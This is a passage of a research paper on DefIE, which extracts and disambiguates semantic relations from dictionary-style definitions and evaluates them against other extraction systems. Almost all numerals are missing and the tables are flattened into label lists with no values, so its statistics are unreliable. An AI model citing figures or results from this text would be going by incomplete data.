our algorithm works as follows: given a textual definition d, we consider every pair of identified concepts or entities and compute the corresponding shortest path in gsemd using the floyd-warshall algorithm (floyd, ). the only constraint we enforce is that resulting paths must include at least one verb node. this condition filters out meaningless single-node patterns (e.g. two concepts connected with a preposition) and, given the prescriptive nature of d, is unlikely to discard semantically relevant attributes compacted in noun phrases. as an example, consider the two sentences "mutter is the third album by german band rammstein" and "atom heart mother is the fifth album by english band pink floyd". in both cases, two valid shortest-path patterns are extracted. the first extracted shortest-path pattern is:

x → is → album bn → by → y

with ai = mutter bn, aj = rammstein bn for the first sentence and ai = atom heart mother bn, aj = pink floyd bn for the second one. the second extracted shortest-path pattern is:

x → is → y

with ai = mutter bn, aj = album bn for the first sentence and ai = atom heart mother bn, aj = album bn for the second one. in fact, our extraction process seamlessly discovers general knowledge (e.g. that mutter bn and atom heart mother bn are instances of the concept album bn) and facts (e.g. that the entities rammstein bn and pink floyd bn have an isalbumby relation with the two recordings).

a pseudo-code for the entire extraction algorithm is shown in algorithm :

algorithm : relation extraction
procedure extractrelationsfrom(d)
    r := ∅
    for each d in d do
        gd := dependencyparse(d)
        sd := disambiguate(d)
        gsemd := buildsemanticgraph(gd, sd)
        for each 〈si, sj〉 in sd do
            〈si, rij, sj〉 := shortestpath(si, sj)
            r := r ∪ {〈si, rij, sj〉}
    filterpatterns(r, ρ)
    return r

given a set of textual definitions d, a set of relations is generated over extractions r, with each relation r ⊂ r comprising relation instances extracted from d. each d ∈ d is first parsed and disambiguated to produce a syntactic-semantic graph gsemd (sections . - . ); then all the concept pairs 〈si, sj〉 are examined to detect relation instances as shortest paths. finally, we filter out from the resulting set all relations for which the number of extracted instances is below a fixed threshold ρ (in all the experiments of section we set ρ = ).
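a minimal python sketch of the core of this procedure, assuming the dependency parse and the sense mapping are already available as plain data structures (networkx is used for the graph; all identifiers and the toy example are illustrative rather than defie's actual implementation):

import itertools
import networkx as nx

def build_semantic_graph(dep_edges, pos_tags, sense_spans):
    """merge token nodes covered by the same sense into one node and keep the remaining
    dependency edges; dep_edges is a list of (head_token, dependent_token) pairs,
    pos_tags maps token -> coarse pos, sense_spans maps sense id -> set of tokens."""
    token_to_node = {}
    for sense, tokens in sense_spans.items():
        for tok in tokens:
            token_to_node[tok] = sense          # e.g. 'pink' and 'floyd' -> 'pink_floyd_bn'
    g = nx.Graph()
    for head, dep in dep_edges:
        h = token_to_node.get(head, head)
        d = token_to_node.get(dep, dep)
        if h != d:                              # edges inside a merged span collapse away
            g.add_edge(h, d)
    for node in g.nodes:
        g.nodes[node]["is_verb"] = pos_tags.get(node) == "VERB"
        g.nodes[node]["is_sense"] = node in sense_spans
    return g

def extract_patterns(g):
    """for every pair of sense nodes, take the shortest path and keep it only if it
    contains at least one verb node, mirroring the constraint described above."""
    senses = [n for n in g.nodes if g.nodes[n]["is_sense"]]
    triples = []
    for a, b in itertools.combinations(senses, 2):
        try:
            path = nx.shortest_path(g, a, b)
        except nx.NetworkXNoPath:
            continue
        if any(g.nodes[n]["is_verb"] for n in path[1:-1]):
            triples.append((a, path[1:-1], b))
    return triples

# toy example for "atom heart mother is the fifth album by english band pink floyd"
dep_edges = [("is", "atom"), ("is", "album"), ("album", "by"), ("by", "floyd"),
             ("floyd", "pink"), ("atom", "heart"), ("heart", "mother")]
pos_tags = {"is": "VERB", "album": "NOUN", "by": "ADP"}
sense_spans = {"atom_heart_mother_bn": {"atom", "heart", "mother"},
               "pink_floyd_bn": {"pink", "floyd"},
               "album_bn": {"album"}}
g = build_semantic_graph(dep_edges, pos_tags, sense_spans)
for a, pattern, b in extract_patterns(g):
    print(a, "->", pattern, "->", b)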
the overall algorithm extracts over million relation instances in our experimental setup (section ), with almost , distinct relations.

relation type signatures and scoring

we further characterize the semantics of our relations by computing semantic type signatures for each r ⊂ r, i.e. by attaching a proper semantic class to both its domain and range (the sets of arguments occurring on the left and right of the pattern). as every element in the domain and range of r is disambiguated, we retrieve the corresponding senses and collect their direct hypernyms. then we select the hypernym covering the largest subset of arguments as the representative semantic class for the domain (or range) of r. we extract hypernyms using babelnet, where taxonomic information covers both general concepts (from the wordnet taxonomy (fellbaum, )) and named entities (from the wikipedia bitaxonomy (flati et al., )).

from the distribution of direct hypernyms over domain and range arguments of r we estimate the quality of r and associate a confidence value with its relation pattern r. intuitively, we want to assign higher confidence to relations where the corresponding distributions have low entropy. for instance, if both sets have a single hypernym covering all arguments, then r arguably captures a well-defined semantic relation and should be assigned high confidence. for each relation r, we compute:

h_r = - \sum_{i=1}^{n} p(h_i) \log p(h_i)

where the h_i (i = 1, ..., n) are all the distinct argument hypernyms over the domain and range of r, and the probabilities p(h_i) are estimated from the proportion of arguments covered in such sets. the lower h_r, the better the semantic types of r are defined. as a matter of fact, however, some valid but over-general relations (e.g. x is a y, x is used for y) have inherently high values of h_r. to obtain a balanced score, we therefore consider two additional factors, i.e. the number of extracted instances for r and the length of the associated pattern r, obtaining the following empirical measure:

\mathrm{score}(r) = \frac{|s_r|}{(h_r + 1) \cdot \mathrm{length}(r)}

with s_r being the set of extracted relation instances for r. the +1 term accounts for cases where h_r = 0. as shown in the examples of table , relations with rather general patterns (such as x known for y) achieve higher scores compared to very specific ones (like x is village bn founded in in y), despite higher entropy values. we validated our measure on the samples of section . , computing the overall precision for different score thresholds. the monotonic decrease of sample precision in figure a shows that our measure captures the quality of extracted patterns better than h_r (figure b).

table : examples of relation scores (pattern, score, entropy): x directed by y; x known for y; x is election district bn of y; x is composer bn from y; x is street bn named after y; x is village bn founded in in y.

figure : precision against score(r) (a) and h_r (b).

relation taxonomization

in the last stage of our approach our set of extracted relations is arranged automatically in a relation taxonomy. the process is carried out by comparing relations pairwise, looking for hypernymy-hyponymy relationships between the corresponding relation patterns; we then build our taxonomy by connecting with an edge those relation pairs for which such a relationship is found.
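before turning to the taxonomization procedures, a small python sketch of the scoring measure defined above, under the assumption that a relation is represented by its pattern tokens, its extracted instances, and the hypernym labels of its arguments (all names and the toy data are illustrative):

from collections import Counter
from math import log

def entropy_of_hypernyms(hypernyms):
    """shannon entropy of the distribution of argument hypernyms (natural log)."""
    counts = Counter(hypernyms)
    total = sum(counts.values())
    return -sum((c / total) * log(c / total) for c in counts.values())

def relation_score(instances, pattern_tokens, hypernyms):
    """score(r) = |S_r| / ((H_r + 1) * length(r)), as in the measure above."""
    h_r = entropy_of_hypernyms(hypernyms)
    return len(instances) / ((h_r + 1) * len(pattern_tokens))

# made-up toy relation "x directed by y": a few instances, one dominant hypernym per side
instances = [("psycho_bn", "alfred_hitchcock_bn"), ("vertigo_bn", "alfred_hitchcock_bn"),
             ("alien_bn", "ridley_scott_bn")]
hypernyms = ["movie_bn", "movie_bn", "movie_bn", "director_bn", "director_bn", "director_bn"]
print(relation_score(instances, ["directed", "by"], hypernyms))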
both the relation figure : hypernym (a) and substring (b) generalizations taxonomization procedures described here examine noun nodes across each relation pattern r, and con- sider for taxonomization only those relations whose patterns are identical except for a single noun node. . hypernym generalization a direct way of identifying hypernym/hyponym noun nodes across relation patterns is to analyze the semantic information attached to them. given two relation patterns ri and rj, differing only in respect of the noun nodes ni and nj, we first look at the as- sociated concepts or entities, ci and cj, and retrieve the corresponding hypernym sets, h(ci) and h(cj). hypernym sets are obtained by iteratively collecting the superclasses of ci and cj from the semantic network of babelnet, up to a fixed height. for instance, given ci = album bn, h(ci) = {work of art bn, creation bn, artifact bn}, and given cj = rammstein bn, h(cj) = {band bn, musical ensemble bn, organization bn}. once we have h(ci) and h(cj), we just check whether cj ∈h(ci) or ci ∈ h(cj) (figure a). according to which is the case, we conclude that rj is a generalization of ri, or that ri is a generalization of rj. . substring generalization the second procedure focuses on the noun (or compound) represented by the node. given two re- lation patterns, ri and rj, we apply the following heuristic: from one of the two nouns, be it ni, any adjunct or modifier is removed, retaining the sole head word n̂i. then, n̂i is compared with nj and, if n̂i = nj, we assume that the relation rj is a gen- eralization of ri (figure b). the simplifying assumption here is that two given relation patterns may be in a hypernymy-hyponymy relationship only when their plain syntactic structure is equivalent (e.g. is n by and is n by, with n and n being two distinct noun nodes). defie nell patty reverb wisenet freebase dbpedia distinct relations distinct relations (disambiguated) - - - - - - average extractions per relation . . . . . . . distinct relation instances distinct concepts/entities involved table : comparative statistics on the relation extraction process experimental setup input. the input corpus used for the relation extraction procedure is the full set of english textual definitions in babelnet . (navigli and ponzetto, ). in fact, any set of textual definitions can be provided as input to defie, ranging from existing dictionaries (like wordnet or wiktionary) to the set of first sentences of wikipedia articles. as it is a merger for various different resources of this kind, babelnet provides a large heterogeneous set com- prising definitions from wordnet, wikipedia, wik- tionary, wikidata and omegawiki. to the best of our knowledge, this set constitutes the largest avail- able corpus of definitional knowledge. we therefore worked on a total of , , textual definitions from the english synsets of babelnet’s knowledge base. we then used the same version of babelnet as the underlying semantic network structure for dis- ambiguating with babelfy. statistics. comparative statistics are shown in table . defie extracts , , relation in- stances, out of which , , feature a fully dis- ambiguated pattern, yielding an average of . dis- ambiguated relation instances extracted from each definition. after the extraction process, our knowl- edge base comprises , distinct semantic re- lations, % of which also have disambiguated content words in their patterns. 
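returning briefly to the two generalization procedures described earlier in this section, the following python sketch shows the pairwise check in a simplified form, assuming each pattern is a token sequence and a small hypernym lookup is available (identifiers and the toy data are illustrative):

def differing_noun(pattern_a, pattern_b):
    """return the index where two equally long patterns differ in exactly one token, else None."""
    if len(pattern_a) != len(pattern_b):
        return None
    diffs = [i for i, (x, y) in enumerate(zip(pattern_a, pattern_b)) if x != y]
    return diffs[0] if len(diffs) == 1 else None

def hypernym_generalizes(concept_a, concept_b, hypernym_sets):
    """true if concept_b is among the collected hypernyms of concept_a."""
    return concept_b in hypernym_sets.get(concept_a, set())

def substring_generalizes(noun_a, noun_b):
    """true if the head word of a modified noun compound equals the other noun,
    e.g. 'studio album' generalizes to 'album'."""
    return noun_a.split()[-1] == noun_b

# toy patterns of the form "x is <noun> by y"
p1 = ["is", "album_bn", "by"]
p2 = ["is", "work_of_art_bn", "by"]
hypernym_sets = {"album_bn": {"work_of_art_bn", "creation_bn"}}
i = differing_noun(p1, p2)
if i is not None and hypernym_generalizes(p1[i], p2[i], hypernym_sets):
    print("pattern 2 generalizes pattern 1")      # hypernym generalization
print(substring_generalizes("studio album", "album"))  # substring generalization -> True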
defie extracts a considerably larger amount of relation instances compared to similar approaches, despite the much smaller amount of text used. for example, we man- aged to harvest over million relation instances more than patty, using a much smaller corpus (sin- babelnet.org according to the wikipedia guidelines, an article should begin with a short declarative sentence, defining what (or who) is the subject and why it is notable. babelfy.org gle sentences as opposed to full wikipedia articles) and generating a number of distinct relations that was six times less than patty’s. as a result, we obtained an average number of extractions that was substantially higher than those of our oie competi- tors. this suggests that defie is able to exploit the nature of textual definitions effectively and general- ize over relation patterns. furthermore, our semantic analysis captured , , distinct arguments (ei- ther concept or named entities), outperforming al- most all open-text systems examined. evaluation. all the evaluations carried out in section were based on manual assessment by two human judges, with an inter-annotator agreement, as measured by cohen’s kappa coefficient, above % in all cases. in these evaluations we compared de- fie with the following oie approaches: • nell (carlson et al., ) with knowledge base beliefs updated to november ; • patty (nakashole et al., ) with free- base types and pattern synsets from the english wikipedia dump of june ; • reverb (fader et al., ), using the set of normalized relation instances from the clueweb dataset; • wisenet (moro and navigli, ; moro and navigli, ) with relational phrases from the english wikipedia dump of december . in addition, we also compared our knowledge base with up-to-date human-contributed resources, namely freebase (bollacker et al., ) and dbpe- dia (lehmann et al., ), both from the dumps of april/may . top top rand rand defie . ± . . ± . . ± . . ± . patty . ± . n/a . ± . n/a table : precision of relation patterns nell patty reverb wisenet freebase dbpedia top . . . . . . rand . . . . . . table : novelty of the extracted information experiments . quality of relations we first assessed the quality and the semantic consistency of our relations using manual evalua- tion. we ranked our relations according to their score (section ) and then created two samples (of size and respectively) of the top scoring relations. in order to evaluate the long tail of less confident relations, we created another two sam- ples of the same size with randomly extracted re- lations. we presented these samples to our human judges, accompanying each relation with a set of argument pairs and the corresponding textual defini- tions from babelnet. for each item in the sample we asked whether it represented a meaningful rela- tion and whether the extracted argument pairs were consistent with this relation and the corresponding definitions. if the answer was positive, the rela- tion was considered as correct. finally we esti- mated the overall precision of the sample as the proportion of correct items. results are reported in table and compared to those obtained by our closest competitor, patty, in the setting of sec- tion . in patty the confidence of a given pattern was estimated from its statistical strength (nakas- hole et al., ). as shown in table , defie achieved a comparable level of accuracy in every sample. an error analysis identified most errors as related to the vagueness of some short and general patterns, e.g. x take y, x make y. 
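the inter-annotator agreement mentioned above is measured with cohen's kappa, i.e. the observed agreement between the two judges corrected for chance agreement; a minimal python sketch on made-up judgments:

from collections import Counter

def cohens_kappa(labels_a, labels_b):
    """cohen's kappa for two annotators over the same items: (p_o - p_e) / (1 - p_e)."""
    assert len(labels_a) == len(labels_b) and labels_a
    n = len(labels_a)
    p_o = sum(a == b for a, b in zip(labels_a, labels_b)) / n          # observed agreement
    freq_a, freq_b = Counter(labels_a), Counter(labels_b)
    categories = set(labels_a) | set(labels_b)
    p_e = sum((freq_a[c] / n) * (freq_b[c] / n) for c in categories)   # chance agreement
    return (p_o - p_e) / (1 - p_e)

# made-up example: two judges labelling ten relation patterns as correct (c) or incorrect (i)
judge_1 = ["c", "c", "c", "i", "c", "c", "i", "c", "c", "i"]
judge_2 = ["c", "c", "c", "i", "c", "i", "i", "c", "c", "i"]
print(round(cohens_kappa(judge_1, judge_2), 2))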
others were re- lated to parsing (e.g. in labeling the head word of complex noun phrases) or disambiguation. in ad- dition, we used the same samples to estimate the novelty of the extracted information in compari- son to currently available resources. we examined each correct relation pattern and looked manually for an equivalent relation in the knowledge bases gold standard defie wisenet patty reverb freebase dbpedia table : coverage of semantic relations of both our oie competitors and human-contributed resources. for instance, given the relation x born in y, nell and reverb have the equivalent rela- tions personborninlocation and is born in, while freebase and dbpedia have place of birth and birthplace respectively. we then computed the proportion of ‘new’ relations among those previously labeled as correct by our human judges. results are shown in table for both the top sample and the random sample. the high proportion of relations not appearing in existing re- sources (especially across the random samples) sug- gests that defie is capable of discovering informa- tion not obtainable from available knowledge bases, including very specific relations (x is blizzard in y, x is mayan language spoken by y, x is government- owned corporation in y ), as well as general but un- usual ones (x used by writer of y ). . coverage of relations to assess the coverage of defie we first tested our extracted relations on a public dataset de- scribed in (nakashole et al., ) and consist- ing of semantic relations manually annotated from five wikipedia pages about musicians. fol- lowing the line of previous works (nakashole et al., ; moro and navigli, ), for each an- notation we sought a relation in our knowledge base carrying the same semantics. results are re- ported in table . consistently with the results in table , the proportion of novel information places defie in line with its closest competitors, achieving a coverage of . % with respect to the gold standard. examples of relations not cov- ered by our competitors are hasfatherinlaw and hasdaughterinlaw. furthermore, relations holding between entities and general concepts (e.g. critizedfor, praisedfor, sentencedto), are captured only by defie and reverb (which, however, lacks any argument semantics). we also assessed the coverage of resources based freebase dbpedia nell random % % % table : coverage of manually curated resources patty wisenet random % % table : coverage of individual relation instances hyp. gen. substr. gen. patty (top) patty (rand) precision . ± . . ± . . ± . . ± . # edges density . × − . × − table : precision and coverage of the relation taxonomy on human-defined semantic relations: we extracted three random samples of relations from free- base, dbpedia and nell and looked for seman- tically equivalent relations in our knowledge base. as shown in table , defie reports a coverage be- tween % and % depending on the resource, fail- ing to cover mostly relations that refer to numerical properties (e.g. numberofmembers). finally, we tested the coverage of defie over in- dividual relation instances. we selected a random sample of triples from the two closest com- petitors exploiting textual corpora, i.e. patty and wisenet. for each selected triple 〈ai, r, aj〉, we sought an equivalent relation instance in our knowl- edge base, i.e. one comprising ai and aj and a re- lation pattern expressing the same semantic relation of r. results in table show a coverage greater than % over both samples. 
given the dramatic re- duction of corpus size and the high precision of the items extracted, these figures demonstrate that def- initional knowledge is extremely valuable for rela- tion extraction approaches. this might suggest that, even in large-scale oie-based resources, a substan- tial amount of knowledge is likely to come from a rather smaller subset of definitional sentences within the source corpus. . quality of relation taxonomization we evaluated our relation taxonomy by manually assessing the accuracy of our taxonomization heuris- tics. then we compared our results against patty, the only system among our closest competitors that generates a taxonomy of relations. the setting for this evaluation was the same of that of section . . however, as we lacked a confidence measure in this case, we just extracted a random sample of hy- pernym edges for each generalization procedure. we presented these samples to our human judges and, for each hypernym edge, we asked whether the cor- responding pair of relations represented a correct generalization. we then estimated the overall preci- sion as the proportion of edges regarded as correct. results are reported in table , along with patty’s results in the setting of section ; as patty’s edges are ranked by confidence, we consid- ered both its top confident subsumptions and a random sample of the same size. as shown in table , defie outperforms patty in terms of precision, and generates more than twice the number of edges overall. harpy (grycner and weikum, ) en- riches patty’s taxonomy with , hypernym edges, but its alignment algorithm, in the setting of section , also includes transitive edges and still yields a sparser taxonomy compared to ours, with a graph density of . × − . generalization errors in our taxonomy are mostly related to disambigua- tion errors or flaws in the wikipedia bitaxonomy (e.g. the concept titular church bn marked as hyponym of cardinal bn). . quality of entity linking and disambiguation we evaluated the disambiguation stage of defie (section . ) by comparing babelfy against other state-of-the-art entity linking systems. in order to compare different disambiguation outputs we se- lected a random sample of , glosses from the input corpus of textual definitions (section ) and ran the relation extraction algorithm (sections . - . ) using a different competitor in the disambigua- tion step each time. we eventually used the map- pings in babelnet to express each output using a common dictionary and sense inventory. the coverage obtained by each competitor was as- sessed by looking at the number of distinct relations extracted in the process, the total number of relation instances extracted, the number of distinct concepts or entities involved, and the average number of se- mantic nodes within the relation patterns. for each competitor, we also assessed the precision obtained by evaluating the quality and semantic consistency of the relation patterns, in the same manner as in # relations # triples # entities average sem. nodes babelfy . tagme . . wat . dbpedia spotlight . wikipedia miner . table : coverage for different disambiguation systems relations relation instances babelfy . % . % tagme . . % . % wat . % . % dbpedia spotlight . % . % wikipedia miner . % . % table : precision for different disambiguation systems section . , both at the level of semantic relations (on the top relation patterns) and at the level of individual relation instances (on a randomly ex- tracted sample of triples). 
results are shown in tables and for babelfy and the following sys- tems: • tagme . (ferragina and scaiella, ), which links text fragments to wikipedia based on measures like sense commonness and keyphraseness (mihalcea and csomai, ); • wat (piccinno and ferragina, ), an en- tity annotator that improves over tagme and features a re-designed spotting, disambiguation and pruning pipeline; • dbpedia spotlight (mendes et al., ), which annotates text documents with dbpedia uris using scores such as prominence, topical relevance and contextual ambiguity; • wikipedia miner (milne and witten, ), which combines parallelized processing of wikipedia dumps, relatedness measures and annotation features. as shown in table , babelfy outperforms all its competitors in terms of coverage and, due to its unified word sense disambiguation and entity link- ing approach, extracts semantically richer patterns tagme.di.unipi.it spotlight.dbpedia.org wikipediadataminer.cms.waikato.ac.nz # definitions proportion (%) wikipedia . wikidata . wordnet . wiktionary . omegawiki . table : composition of the input corpus by source # relations # relation instances avg. extractions wikipedia . wikidata . wordnet . wiktionary . omegawiki . table : impact of each source on the extraction step with . semantic nodes on the average per sen- tence. this reflects on the quality of semantic rela- tions, reported in table , with an overall increase of precision both in terms of relations and in terms of individual instances; even though wat shows slightly higher precision over relations, its consid- erably lower coverage yields semantically poor pat- terns ( . semantic nodes on the average) and im- pacts on the overall quality of relations, where some ambiguity is necessarily retained. as an example, the pattern x is station in y, extracted from wat’s disambiguation output, covers both railway stations and radio broadcasts. babelfy produces, instead, two distinct relation patterns for each sense, tag- ging station as railway station bn for the for- mer and station bn for the latter. . impact of definition sources we carried out an empirical analysis over the input corpus in our experimental setup, studying the impact of each source of textual definitions in isolation. in fact, as explained in section , babelnet’s textual definitions come from various resources: wordnet, wikipedia, wikidata, wik- tionary and omegawiki. table shows the com- position of the input corpus with respect to each of these definition sources. the distribution is rather skewed, with the vast majority of definitions coming from wikipedia (almost % of the input corpus). we ran the relation extraction algorithm (sections . - . ) on each subset of the input corpus. as in previous experiments, we report the number of re- lation instances extracted, the number of distinct re- # wikipages # sentences # extractions precision all . % top . % table : extraction results over non-definitional text # relation instances # relations # edges patty (definitions) patty (wikipedia) our system table : performance of patty on definitional data lations, and the average number of extractions for each relation. results, as shown in table , are consistent with the composition of the input cor- pus in table : by relying solely on wikipedia’s first sentences, the extraction algorithm discovered % of all the distinct relations identified across the whole input corpus, and % of the total num- ber of extracted instances. 
wikidata provides more than million extractions ( % of the total) but def- initions are rather short and most of them ( . %) generate only is-a relation instances. the remain- ing sources (wordnet, wiktionary, omegawiki) ac- count for less than % of the extractions. . impact of the approach vs. impact of the data defie’s relation extraction algorithm is explic- itly designed to target textual definitions. hence, the result it achieves is due to the mutual contribution of two key features: an oie approach and the use of definitional data. in order to decouple these two factors and study their respective im- pacts, we carried out two experiments: first we applied defie to a sample of non-definitional text; then we applied our closest competitor, patty, on the same definition corpus described in section . extraction from non-definitional text. we selected a random sample of wikipedia pages from the english wikipedia dump of october . we processed each sentence as in sections . - . and extracted instances of those relations produced by defie in the original definitional setting (section ); we then automatically filtered out those instances where the arguments’ hypernyms did not agree with the semantic types of the relation. we evaluated manually the quality of extractions on a sample of source label target enzyme bn catalyzes reaction bn of chemical bn album bn recorded by rock group bn officier bn commanded brigade bn of army unit bn bridge bn crosses over river bn academic journal bn covers research bn in science bn organization bn has headquarters bn in city bn table : examples of augmented semantic edges items (as in section . ) for both the full set of extracted instances and for the subset of extractions from the top scoring relations. results are reported in table : in both cases, precision figures show that extraction quality drops consistently in comparison to section . , suggesting that our extraction approach by itself is less accurate when moving to more complex sentences (with, e.g., subordinate clauses or coreferences). patty on textual definitions. since no open- source implementation of patty is available, we implemented a version of the algorithm which uses babelfy for named entity disambiguation. we then ran it on our corpus of babelnet definitions and compared the results against those originally ob- tained by patty (on the entire wikipedia corpus) and those obtained by defie. figures are reported in table in terms of number of extracted relation instances, distinct relations and hypernym edges in the relation taxonomy. results show that the dra- matic reduction of corpus size affects the support sets of patty’s relations, worsening both coverage and generalization capability. . preliminary study: resource enrichment to further investigate the potential of our ap- proach, we explored the application of defie to the enrichment of existing resources. we focused on babelnet as a case study. in babelnet’s seman- tic network, nodes representing concepts and en- tities are only connected via lexicograhic relation- ships from wordnet (hypernymy, meronymy, etc.) or unlabeled edges derived from wikipedia hyper- links. our extraction algorithm has the potential to provide useful information to both augment unla- beled edges with labels and explicit semantic con- tent, and create additional connections based on se- mantic relations. examples are shown in table . 
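the connectivity check behind this enrichment analysis can be sketched in a few lines; the adjacency encoding and all names below are assumptions made for illustration, not babelnet's actual api. for each candidate pair of concepts, the question is whether the semantic network already connects them and, if so, whether the connecting edge carries a label.

```python
from typing import Dict, Set

# hypothetical encoding of the semantic network: per node, neighbours reached
# via unlabeled edges (e.g. hyperlinks) and via labeled relationships.
unlabeled: Dict[str, Set[str]] = {"enzyme": {"chemical"}, "album": set()}
labeled: Dict[str, Set[str]] = {"album": {"rock group"}}

def edge_status(a: str, b: str) -> str:
    """Classify a concept pair as 'labeled', 'unlabeled' or 'disconnected' in the network."""
    if b in labeled.get(a, set()) or a in labeled.get(b, set()):
        return "labeled"
    if b in unlabeled.get(a, set()) or a in unlabeled.get(b, set()):
        return "unlabeled"
    return "disconnected"

# aggregate over argument pairs of extracted relation instances
pairs = [("enzyme", "chemical"), ("album", "rock group"), ("bridge", "river")]
counts = {"labeled": 0, "unlabeled": 0, "disconnected": 0}
for a, b in pairs:
    counts[edge_status(a, b)] += 1
print(counts)  # {'labeled': 1, 'unlabeled': 1, 'disconnected': 1}
```

the proportions of disconnected and unlabeled pairs are what indicate how much connectivity and labeling the extracted relations could add.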
# concept pairs # unlabeled # labeled type signatures relation instances table : concept pairs and associated edges in babelnet we carried out a preliminary analysis over all dis- ambiguated relations with at least extracted in- stances. for each relation pattern r, we first exam- ined the concept pairs associated with its type signa- tures and looked in babelnet for an unlabeled edge connecting the pair. then we examined the whole set of extracted relation instances in r and looked in babelnet for an unlabeled edge connecting the argu- ments ai and aj. results in table show that only . % of the concept pairs representing relation type signatures are connected in babelnet, and most of these connections are unlabeled. by the same token, more than million distinct argument pairs ( . %) do not share any edge in the semantic network and, among those that do, less than % have a labeled relationship. these proportions suggest that our re- lations provide a potential enrichment of the under- lying knowledge base in terms of both connectivity and labeling of existing edges. in babelnet, our case study, cross-resource mappings might also propa- gate this information across other knowledge bases and rephrase semantic relations in terms of, e.g., au- tomatically generated wikipedia hyperlinks. related work from the earliest days, oie systems had to cope with the dimension and heterogeneity of huge un- structured sources of text. the first systems em- ployed statistical techniques and relied heavily on information redundancy. then, as soon as semi- structured resources came into play (hovy et al., ), researchers started developing learning sys- tems based on self-supervision (wu and weld, ) and distant supervision (mintz et al., ; krause et al., ). crucial issues in distant supervision, like noisy training data, have been addressed in var- ious ways: probabilistic graphical models (riedel et al., ; hoffmann et al., ), sophisticated multi-instance learning algorithms (surdeanu et al., ), matrix factorization techniques (riedel et al., ), labeled data infusion (pershina et al., ) or crowd-based human computing (kondreddi et al., ). a different strategy consists of moving from open text extraction to more constrained settings. for instance, the knowledge vault (dong et al., ) combines web-scale extraction with prior knowledge from existing knowledge bases; biper- pedia (gupta et al., ) relies on schema-level attributes from the query stream in order to create an ontology of class-attribute pairs; renoun (yahya et al., ) in turn exploits biperpedia to extract facts expressed as noun phrases. defie focuses, in- stead, on smaller and denser corpora of prescriptive knowledge. although early works, such as mindnet (richardson et al., ), had already highlighted the potential of textual definitions for extracting re- liable semantic information, no oie approach to the best of our knowledge has exploited definitional data to extract and disambiguate a large knowledge base of semantic relations. the direction of most papers (especially in the recent oie literature) seems rather the opposite, namely, to target web-scale corpora. in contrast, we manage to extract a large amount of high-quality information by combining an oie un- supervised approach with definitional data. a deeper linguistic analysis constitutes the fo- cus of many oie approaches. 
syntactic dependen- cies are used to construct general relation patterns (nakashole et al., ), or to improve the qual- ity of surface pattern realizations (moro and nav- igli, ). phenomena like synonymy and poly- semy have been addressed with kernel-based simi- larity measures and soft clustering techniques (min et al., ; moro and navigli, ), or exploiting the semantic types of relation arguments (nakashole et al., ; moro and navigli, ). an appro- priate modeling of semantic types (e.g. selectional preferences) constitutes a line of research by itself, rooted in earlier works like (resnik, ) and fo- cused on either class-based (clark and weir, ), or similarity-based (erk, ), approaches. how- ever, these methods are used to model the seman- tics of verbs rather than arbitrary patterns. more re- cently some strategies based on topic modeling have been proposed, either to infer latent relation seman- tic types from oie relations (ritter et al., ), or to directly learn an ontological structure from a start- ing set of relation instances (movshovitz-attias and cohen, ). however, the knowledge generated is often hard to interpret and integrate with existing knowledge bases without human intervention (rit- ter et al., ). in this respect, the semantic predi- cates proposed by flati and navigli ( ) seem to be more promising. a novelty in our approach is that issues like poly- semy and synonymy are explicitly addressed with a unified entity linking and disambiguation algorithm. by incorporating explicit semantic content in our re- lation patterns, not only do we make relations less ambiguous, but we also abstract away from specific lexicalizations of the content words and merge to- gether many patterns conveying the same semantics. rather than using plain dependencies we also inject explicit semantic content into the dependency graph to generate a unified syntactic-semantic representa- tion. previous works (moro et al., ) used simi- lar semantic graph representations to produce filter- ing rules for relation extraction, but they required a starting set of relation patterns and did not exploit syntactic information. a joint approach of syntactic- semantic analysis of text was used in works such as (lao et al., ), but they addressed a substan- tially different task (inference for knowledge base completion) and assumed a radically different set- ting, with a predefined starting set of semantic re- lations from a given knowledge base. as we en- force an oie approach, we do not have such require- ments and directly process the input text via parsing and disambiguation. this enables defie to gener- ate relations already integrated with resources like wordnet and wikipedia, without additional align- ment steps (grycner and weikum, ), or seman- tic type propagations (lin et al., ). as shown in section . , explicit semantic content within re- lation patterns underpins a rich and high-quality re- lation taxonomy, whereas generalization in (nakas- hole et al., ) is limited to support set inclusion and leads to sparser and less accurate results. conclusion and future work we presented defie, an approach to oie that, thanks to a novel unified syntactic-semantic analy- sis of text, harvests instances of semantic relations from a corpus of textual definitions. defie ex- tracts knowledge on a large scale, reducing data sparsity and disambiguating both arguments and re- lation patterns at the same time. 
unlike previous semantically-enhanced approaches, mostly relying on the semantics of argument types, defie is able to semantify relation phrases as well, by providing explicit links to the underlying knowledge base. we leveraged an input corpus of . million definitions and extracted over million relation instances, with more than , distinct relations and almost . million concepts and entities involved. from these relations we automatically constructed a high- quality relation taxonomy by exploiting the explicit semantic content of the relation patterns. in the resulting knowledge base concepts and entities are linked to existing resources, such as wordnet and wikipedia, via the babelnet semantic network. we evaluated defie in terms of precision, coverage, novelty of information in comparison to existing re- sources and quality of disambiguation, and we com- pared our relation taxonomy against state-of-the-art systems obtaining highly competitive results. a key feature of our approach is its deep syntactic-semantic analysis targeted to textual def- initions. in contrast to our competitors, where syn- tactic constraints are necessary in order to keep pre- cision high when dealing with noisy data, defie shows comparable (or greater) performances by ex- ploiting a dense, noise-free definitional setting. de- fie generates a large knowledge base, in line with collaboratively-built resources and state-of-the-art oie systems, but uses a much smaller amount of in- put data: our corpus of definitions comprises less than million tokens overall, while other oie sys- tems exploit massive corpora like wikipedia (typi- cally more than . billion tokens), clueweb (more than billion tokens), or the web itself. fur- thermore, our semantic analysis based on babelfy enables the discovery of semantic connections be- tween both general concepts and named entities, with the potential to enrich existing structured and semi-structured resources, as we showed in a pre- liminary study on babelnet (cf. section . ). as the next step, we plan to apply defie to open text and integrate it with definition extraction and automatic gloss finding algorithms (navigli and ve- lardi, ; dalvi et al., ). also, by further ex- ploiting the underlying knowledge base, inference and learning techniques (lao et al., ; wang et al., ) can be applied to complement our model, generating new triples or correcting wrong ones. fi- nally, another future perspective is to leverage the increasingly large variety of multilingual resources, like babelnet, and move towards the modeling of language-independent relations. acknowledgments the authors gratefully acknowledge the support of the erc starting grant multijedi no. . this research was also partially supported by google through a faculty research award granted in july . references kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collab- oratively created graph database for structuring hu- man knowledge. in proceedings of sigmod, pages – . andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in proceedings of aaai, pages – . stephen clark and james r. curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics, ( ): – . stephen clark and david weir. . class-based prob- ability estimation using a semantic 